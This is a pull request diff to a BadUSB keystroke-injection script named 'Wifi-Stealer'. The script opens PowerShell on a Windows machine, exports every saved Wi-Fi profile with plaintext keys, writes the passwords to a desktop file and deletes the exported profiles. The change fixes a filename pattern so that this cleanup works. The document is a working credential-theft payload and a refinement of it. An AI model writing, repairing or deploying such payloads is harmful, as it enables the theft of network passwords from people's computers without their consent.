### PR TITLE
Update Wifi-Stealer_ORG.txt

### DIFF
--- a/applications/main/bad_usb/resources/badusb/Wifi-Stealer_ORG.txt
+++ b/applications/main/bad_usb/resources/badusb/Wifi-Stealer_ORG.txt
@@ -9,5 +9,5 @@ DELAY 500
 STRING powershell 
 ENTER
 DELAY 500
-STRING cd C:\Users\$env:UserName\Desktop; netsh wlan export profile key=clear; Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del WiFi-*;exit
+STRING cd C:\Users\$env:UserName\Desktop; netsh wlan export profile key=clear; Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del Wi-Fi-*;exit
 ENTER


### PR DESCRIPTION
Error leaving files that should be deleted, bug fixes.

# What's new

- deleting files that we dont need.

# Verification 

- same procedure for a bad usb

# Checklist (For Reviewer)

-  The updated script successfully deletes unnecessary files.
- Verification steps align with typical USB drive workflows, ensuring the script works as expected in similar environments.
